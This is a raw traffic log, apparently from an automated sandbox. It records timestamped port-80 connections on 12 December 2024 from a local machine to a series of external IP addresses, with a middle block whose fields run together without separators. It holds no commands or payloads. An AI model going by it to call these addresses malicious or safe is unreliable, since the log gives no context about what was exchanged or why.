Dec 12, 2024 00:19:23.340223074 CET | 80 | 49864 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:23.343019009 CET | 80 | 49864 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:24.709273100 CET | 80 | 49864 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:24.709472895 CET | 80 | 49864 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:24.709647894 CET | 49864 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:24.722141981 CET | 49864 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:25.740930080 CET | 49873 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:25.862457037 CET | 80 | 49873 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:25.862634897 CET | 49873 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:25.874519110 CET | 49873 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:25.996028900 CET | 80 | 49873 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:27.352281094 CET | 80 | 49873 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:27.352310896 CET | 80 | 49873 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:27.352459908 CET | 49873 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:27.355815887 CET | 49873 | 80 | 192.168.2.5 | 124.71.162.21
Dec 12, 2024 00:19:27.596137047 CET | 80 | 49873 | 124.71.162.21 | 192.168.2.5
Dec 12, 2024 00:19:33.137367964 CET | 49889 | 80 | 192.168.2.5 | 150.109.11.247
Dec 12, 2024 00:19:33.258388996 CET | 80 | 49889 | 150.109.11.247 | 192.168.2.5
Dec 12, 2024 00:19:33.258585930 CET | 49889 | 80 | 192.168.2.5 | 150.109.11.247
Dec 12, 2024 00:19:33.273760080 CET | 49889 | 80 | 192.168.2.5 | 150.109.11.247
                                                                                  Dec 12, 2024 00:19:33.394870996 CET8049889150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:34.784764051 CET4988980192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:34.830887079 CET8049889150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:34.830900908 CET8049889150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:34.831163883 CET4988980192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:34.831163883 CET4988980192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:34.906331062 CET8049889150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:34.906589031 CET4988980192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:35.803070068 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:35.924730062 CET8049896150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:35.924835920 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:35.938417912 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:36.060061932 CET8049896150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:37.440962076 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:37.480165005 CET8049896150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:37.480211020 CET8049896150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:37.480284929 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:37.480284929 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:37.561805010 CET8049896150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:37.561903000 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:38.459414005 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:38.579061031 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:38.579226971 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:38.593681097 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:38.713059902 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:38.713165045 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:40.097012997 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:40.287234068 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:40.287270069 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:40.287308931 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:40.287338972 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:40.287698030 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:40.287755966 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:40.393037081 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:40.393094063 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:41.115358114 CET4991180192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:41.234689951 CET8049911150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:41.235446930 CET4991180192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:41.243158102 CET4991180192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:41.362459898 CET8049911150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:42.777731895 CET8049911150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:42.778078079 CET8049911150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:42.778153896 CET4991180192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:42.780942917 CET4991180192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:42.900417089 CET8049911150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:48.762160063 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:48.883758068 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:48.883966923 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:48.903033972 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:49.024519920 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.045525074 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.045655966 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.045667887 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.045715094 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:50.046139002 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046154022 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046169996 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046181917 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046185970 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:50.046217918 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:50.046696901 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046706915 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046716928 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046750069 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:50.046768904 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:50.051239967 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.051309109 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:50.409600973 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:51.427686930 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:51.549413919 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:51.549604893 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:51.565583944 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:51.687019110 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.710707903 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.710783005 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.710794926 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.710836887 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:52.711070061 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711081028 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711090088 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711100101 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711116076 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:52.711148024 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:52.711468935 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711486101 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711493969 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711517096 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:52.711541891 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:52.716586113 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.716640949 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:53.065840006 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:54.086905956 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:54.208141088 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:54.208228111 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:54.223640919 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:54.345175982 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:54.347357988 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398338079 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398406982 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398417950 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398570061 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398581028 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398802996 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398821115 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398832083 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398842096 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398852110 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.398864031 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:55.398864031 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:55.399358034 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:55.406243086 CET8049941173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:55.406497002 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:55.738966942 CET4994180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:56.755945921 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:56.875186920 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:56.881412029 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:56.886972904 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:57.006221056 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.044935942 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045036077 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045053959 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045150042 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.045278072 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045295000 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045310974 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045321941 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.045331001 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045371056 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.045689106 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045732021 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.045814991 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045830011 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.045871973 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.045974970 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:58.046025038 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.054088116 CET4995180192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:58.173464060 CET8049951173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:20:03.628238916 CET4996780192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:03.747567892 CET8049967209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:03.747709990 CET4996780192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:03.762929916 CET4996780192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:03.883215904 CET8049967209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:04.992533922 CET8049967209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:04.992724895 CET8049967209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:04.998935938 CET4996780192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:05.269303083 CET4996780192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:06.288503885 CET4997480192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:06.409848928 CET8049974209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:06.409941912 CET4997480192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:06.429075003 CET4997480192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:06.550086021 CET8049974209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:07.656577110 CET8049974209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:07.656647921 CET8049974209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:07.656868935 CET4997480192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:07.940706968 CET4997480192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:08.959703922 CET4998080192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:09.080863953 CET8049980209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:09.081011057 CET4998080192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:09.097485065 CET4998080192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:09.218832970 CET8049980209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:09.218859911 CET8049980209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:10.574354887 CET8049980209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:10.574373007 CET8049980209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:10.574430943 CET4998080192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:10.611747026 CET8049980209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:10.611799955 CET4998080192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:10.612493038 CET4998080192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:11.631360054 CET4998680192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:11.752111912 CET8049986209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:11.758896112 CET4998680192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:11.766904116 CET4998680192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:11.887933016 CET8049986209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:12.984282017 CET8049986209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:12.984293938 CET8049986209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:12.985064030 CET4998680192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:12.987770081 CET4998680192.168.2.5209.74.79.42
                                                                                  Dec 12, 2024 00:20:13.109086037 CET8049986209.74.79.42192.168.2.5
                                                                                  Dec 12, 2024 00:20:19.361618042 CET5000180192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:19.480868101 CET805000118.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:19.481005907 CET5000180192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:19.499521017 CET5000180192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:19.618803024 CET805000118.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:21.003076077 CET5000180192.168.2.518.139.62.226
                                                                                  Dec 12, 2024 00:20:21.104382992 CET805000118.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:21.104516029 CET805000118.139.62.226192.168.2.5
                                                                                  Dec 12, 2024 00:20:21.104657888 CET5000180192.168.2.518.139.62.226
Dec 12, 2024 00:20:21.104657888 CET | 50001 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:21.123939991 CET | 80 | 50001 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:21.124105930 CET | 50001 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:22.022130966 CET | 50002 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:22.141387939 CET | 80 | 50002 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:22.141470909 CET | 50002 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:22.157824993 CET | 50002 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:22.277080059 CET | 80 | 50002 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:23.660886049 CET | 50002 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:23.732131958 CET | 80 | 50002 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:23.732148886 CET | 80 | 50002 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:23.733181000 CET | 50002 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:23.733181000 CET | 50002 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:23.782018900 CET | 80 | 50002 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:23.784701109 CET | 50002 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:24.678173065 CET | 50003 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:24.797619104 CET | 80 | 50003 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:24.797718048 CET | 50003 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:24.813807011 CET | 50003 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:24.933172941 CET | 80 | 50003 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:24.933249950 CET | 80 | 50003 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:26.315495014 CET | 50003 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:26.393815041 CET | 80 | 50003 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:26.393897057 CET | 50003 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:26.393908978 CET | 80 | 50003 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:26.393995047 CET | 50003 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:26.436636925 CET | 80 | 50003 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:26.436744928 CET | 50003 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:27.335360050 CET | 50004 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:27.457237959 CET | 80 | 50004 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:27.458986044 CET | 50004 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:27.474821091 CET | 50004 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:27.596007109 CET | 80 | 50004 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:29.046928883 CET | 80 | 50004 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:29.047007084 CET | 80 | 50004 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:29.047422886 CET | 50004 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:29.050827980 CET | 50004 | 80 | 192.168.2.5 | 18.139.62.226
Dec 12, 2024 00:20:29.171603918 CET | 80 | 50004 | 18.139.62.226 | 192.168.2.5
Dec 12, 2024 00:20:34.922838926 CET | 50005 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:35.042401075 CET | 80 | 50005 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:35.042692900 CET | 50005 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:35.068353891 CET | 50005 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:35.187824965 CET | 80 | 50005 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:36.572283983 CET | 80 | 50005 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:36.572443008 CET | 80 | 50005 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:36.572504044 CET | 50005 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:36.581084013 CET | 50005 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:37.599263906 CET | 50006 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:37.719213963 CET | 80 | 50006 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:37.721451998 CET | 50006 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:37.733057976 CET | 50006 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:37.852473021 CET | 80 | 50006 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:39.237741947 CET | 50006 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:39.250551939 CET | 80 | 50006 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:39.250729084 CET | 50006 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:39.250771999 CET | 80 | 50006 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:39.251351118 CET | 50006 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:39.358573914 CET | 80 | 50006 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:39.358791113 CET | 50006 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:40.257128000 CET | 50007 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:40.378072977 CET | 80 | 50007 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:40.378160954 CET | 50007 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:40.390288115 CET | 50007 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:40.511120081 CET | 80 | 50007 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:40.512681007 CET | 80 | 50007 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:41.893842936 CET | 50007 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:42.015533924 CET | 80 | 50007 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:42.015598059 CET | 50007 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:42.911911011 CET | 50008 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:43.033790112 CET | 80 | 50008 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:43.034842968 CET | 50008 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:43.044095039 CET | 50008 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:43.165390968 CET | 80 | 50008 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:44.566230059 CET | 80 | 50008 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:44.566247940 CET | 80 | 50008 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:44.566391945 CET | 50008 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:44.569375992 CET | 50008 | 80 | 192.168.2.5 | 101.32.205.61
Dec 12, 2024 00:20:44.688711882 CET | 80 | 50008 | 101.32.205.61 | 192.168.2.5
Dec 12, 2024 00:20:52.751106977 CET | 50009 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:52.872113943 CET | 80 | 50009 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:20:52.872210979 CET | 50009 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:52.883976936 CET | 50009 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:53.005058050 CET | 80 | 50009 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:20:54.153814077 CET | 80 | 50009 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:20:54.153834105 CET | 80 | 50009 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:20:54.154006004 CET | 50009 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:54.393544912 CET | 50009 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:55.439996958 CET | 50010 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:55.561780930 CET | 80 | 50010 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:20:55.562812090 CET | 50010 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:55.573148966 CET | 50010 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:55.694588900 CET | 80 | 50010 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:20:56.845474958 CET | 80 | 50010 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:20:56.845530033 CET | 80 | 50010 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:20:56.845701933 CET | 50010 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:57.081150055 CET | 50010 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:58.099150896 CET | 50011 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:58.219670057 CET | 80 | 50011 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:20:58.219784975 CET | 50011 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:58.232774973 CET | 50011 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:58.352396011 CET | 80 | 50011 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:20:58.352437973 CET | 80 | 50011 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:20:59.519824982 CET | 80 | 50011 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:20:59.519870996 CET | 80 | 50011 | 38.6.78.235 | 192.168.2.5
Dec 12, 2024 00:20:59.519969940 CET | 50011 | 80 | 192.168.2.5 | 38.6.78.235
Dec 12, 2024 00:20:59.737185955 CET | 50011 | 80 | 192.168.2.5 | 38.6.78.235
